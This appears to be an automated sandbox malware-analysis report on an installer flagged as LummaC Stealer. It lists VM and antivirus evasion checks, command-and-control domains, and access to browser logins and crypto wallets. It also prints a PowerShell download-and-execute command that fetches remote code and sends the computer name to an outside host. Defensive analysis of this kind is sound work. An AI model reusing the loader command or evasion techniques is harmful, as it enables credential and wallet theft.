              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Set-up.exeSystem information queried: FirmwareTableInformationJump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BB37C44
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BB3F3E1 second address: 6BB3F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BB3F3FD second address: 6BB3F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F5954C361B5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F5954C36240h 0x00000031 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2904Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 474Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\Desktop\Set-up.exe TID: 4020Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep count: 2904 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep count: 474 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: PU6S498VOPMOZVY2Y7.exe.0.drBinary or memory string: puQEMus
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.0000000000601000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000002.2012900321.00000000009FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000002.2012900321.00000000009FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
              Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221039B mov edx, dword ptr fs:[00000030h]0_2_0221039B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0221095B mov eax, dword ptr fs:[00000030h]0_2_0221095B
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02210FAB mov eax, dword ptr fs:[00000030h]0_2_02210FAB
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02210FAA mov eax, dword ptr fs:[00000030h]0_2_02210FAA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02210D0B mov eax, dword ptr fs:[00000030h]0_2_02210D0B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
              LummaC encrypted strings found
              Source: Set-up.exeString found in binary or memory: cloudewahsj.shop
              Source: Set-up.exeString found in binary or memory: rabidcowse.shop
              Source: Set-up.exeString found in binary or memory: noisycuttej.shop
              Source: Set-up.exeString found in binary or memory: tirepublicerj.shop
              Source: Set-up.exeString found in binary or memory: cellardesiresso.sbs
              Source: Set-up.exeString found in binary or memory: framekgirus.shop
              Source: Set-up.exeString found in binary or memory: wholersorie.shop
              Source: Set-up.exeString found in binary or memory: abruptyopsn.shop
              Source: Set-up.exeString found in binary or memory: nearycrepso.shop
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; (a
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; (aJump to behavior
              Source: BrightLib.exe, 00000024.00000000.2455612462.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2499423474.000000000049A000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: BrightLib.exe, 00000024.00000000.2455612462.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2499423474.000000000049A000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
              Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2a993b7e VolumeInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeCode function: 36_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,36_2_00491486
              Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: find.exe, 0000001B.00000002.2392963390.000001FB819D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
              Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 3492, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: gxmgs/Electrum-LTC_^_
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/ElectronCash_
              Source: Set-up.exeString found in binary or memory: Jaxx Liberty
              Source: Set-up.exeString found in binary or memory: ExodusWeb3
              Source: Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Set-up.exe, 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
